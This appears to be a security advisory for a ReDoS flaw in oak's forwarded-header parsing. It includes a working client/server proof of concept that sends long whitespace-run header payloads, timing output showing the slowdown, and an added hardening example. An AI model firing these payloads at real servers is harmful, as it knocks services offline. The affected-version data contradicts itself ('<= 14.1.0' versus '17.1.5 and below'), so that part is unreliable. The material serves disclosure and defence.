Description
Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers
Summary
With a specially crafted value of the x-forwarded-proto or x-forwarded-for header, it is possible to significantly slow down an oak server.
Vulnerable Code
- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87
- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142
PoC
- setup
deno --version
deno 2.4.3
v8 13.7.152.14-rusty
typescript 5.8.3
server.ts
import { Application } from "https://deno.land/x/oak/mod.ts";

// proxy: true makes oak trust and parse the x-forwarded-* headers
const app = new Application({ proxy: true });
let i = 1;
app.use((ctx) => {
  // let url = ctx.request.url; // test1) x-forwarded-proto
  let ips = ctx.request.ips; // test2) x-forwarded-for
  console.log(`request ${i} received`);
  i++;
  ctx.response.body = "hello";
});
await app.listen({ port: 8080 });
client.ts
const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000];
// normal values: a run of letters
const data1 = lengths.map((l) => "A" + "A".repeat(l) + "A");
// payloads: a run of spaces between two letters
const data2 = lengths.map((l) => "A" + " ".repeat(l) + "A");

async function run(data: string[]) {
  for (let i = 0; i < data.length; i++) {
    let d = data[i];
    const start = performance.now();
    await fetch("http://localhost:8080", {
      headers: {
        // "x-forwarded-proto": d, // test1)
        "x-forwarded-for": d, // test2)
      },
    });
    const end = performance.now();
    console.log("length=%d, time=%d ms", d.length, end - start);
  }
}

console.log("\n[+] Test normal behavior");
await run(data1);
console.log("\n[+] Test payloads");
await run(data2);
- run
deno run --allow-net server.ts
deno run --allow-net client.ts
[+] Test normal behavior
length=2002, time=14 ms
length=4002, time=6 ms
length=8002, time=3 ms
length=16002, time=3 ms
length=32002, time=2 ms
length=64002, time=4 ms
length=128002, time=3 ms
[+] Test payloads
length=2002, time=7 ms
length=4002, time=22 ms
length=8002, time=77 ms
length=16002, time=241 ms
length=32002, time=947 ms
length=64002, time=4020 ms
length=128002, time=15840 ms
Impact
A specially crafted value of the x-forwarded-proto or x-forwarded-for headers can be used to significantly slow down an oak server.
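The timings above show the classic quadratic signature of a backtracking regex applied to a header that an attacker fully controls. The block below is an added example, not code from the advisory or from the oak project: it contrasts a hypothetical regex-based split of the kind that backtracks on long whitespace runs (a stand-in for the vulnerable pattern; the project's actual code is at the request.ts lines linked above) with a linear-time split on the literal comma, and adds a length cap on the header before any parsing. The function names, the 1024-byte limit and the sample header values are all assumptions made for this example.

```typescript
// Added example (not oak's code): safe parsing of comma-separated
// forwarded headers such as x-forwarded-for / x-forwarded-proto.

// Hypothetical regex split that backtracks badly: for "A" + " ".repeat(n) + "A"
// the \s* at every start position consumes the whole run of spaces, fails to
// find a comma, and backtracks one character at a time, giving O(n^2) work.
function splitForwardedRegex(value: string): string[] {
  return value.split(/\s*,\s*/);
}

// Hardened variant: split on the literal comma, then trim each element once.
// Every character is visited a bounded number of times, so the cost is O(n).
function splitForwardedLinear(value: string): string[] {
  return value
    .split(",")
    .map((v) => v.trim())
    .filter((v) => v.length > 0);
}

// Defence in depth: reject oversized headers before parsing at all. A real
// proxy chain produces a few hundred bytes at most; 1024 is an assumed limit.
const MAX_FORWARDED_HEADER_LENGTH = 1024;

function parseForwardedFor(value: string | null): string[] {
  if (value === null) return [];
  if (value.length > MAX_FORWARDED_HEADER_LENGTH) {
    throw new RangeError(
      `x-forwarded-for header exceeds ${MAX_FORWARDED_HEADER_LENGTH} bytes`,
    );
  }
  return splitForwardedLinear(value);
}

// Wall-clock timing helper for the stand-alone demo below.
function timeMs(fn: () => unknown): number {
  const start = performance.now();
  fn();
  return performance.now() - start;
}

// Constructed sample inputs mirroring the PoC: a normal list and a whitespace run.
const NORMAL_HEADER = "203.0.113.7, 198.51.100.2 ,10.0.0.1";
function whitespacePayload(n: number): string {
  return "A" + " ".repeat(n) + "A";
}

// Demo: the same 16000-space payload through both parsers.
const demoPayload = whitespacePayload(16000);
console.log("regex split:  " + timeMs(() => splitForwardedRegex(demoPayload)).toFixed(1) + " ms");
console.log("linear split: " + timeMs(() => splitForwardedLinear(demoPayload)).toFixed(1) + " ms");
console.log("parsed normal header:", parseForwardedFor(NORMAL_HEADER));
```

Both splits return the same list for a well-formed header, so the hardened version is a drop-in replacement; the difference only shows on hostile input, where the linear split finishes in microseconds regardless of length. The length cap is the cheaper control and is worth having even after the regex is gone, since it also bounds memory and log volume for any downstream consumer of the parsed list.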
Similar Issues
Links
- https://github.com/oakserver/oak/security/advisories/GHSA-r3v7-pc4g-7xp9
- https://nvd.nist.gov/vuln/detail/CVE-2025-55152
- https://github.com/oakserver/oak/commit/b60e60330ef227707c4dc13ef0ea36192d894f44
- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142
- https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87
Packages
Name: @oakserver/oak (npm)
Affected versions: <= 14.1.0
Fixed version: none
Related vulnerabilities
CVSS3: 5.3
nvd
6 months ago
oak is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. In versions 17.1.5 and below, it's possible to significantly slow down an oak server with specially crafted values of the x-forwarded-proto or x-forwarded-for headers.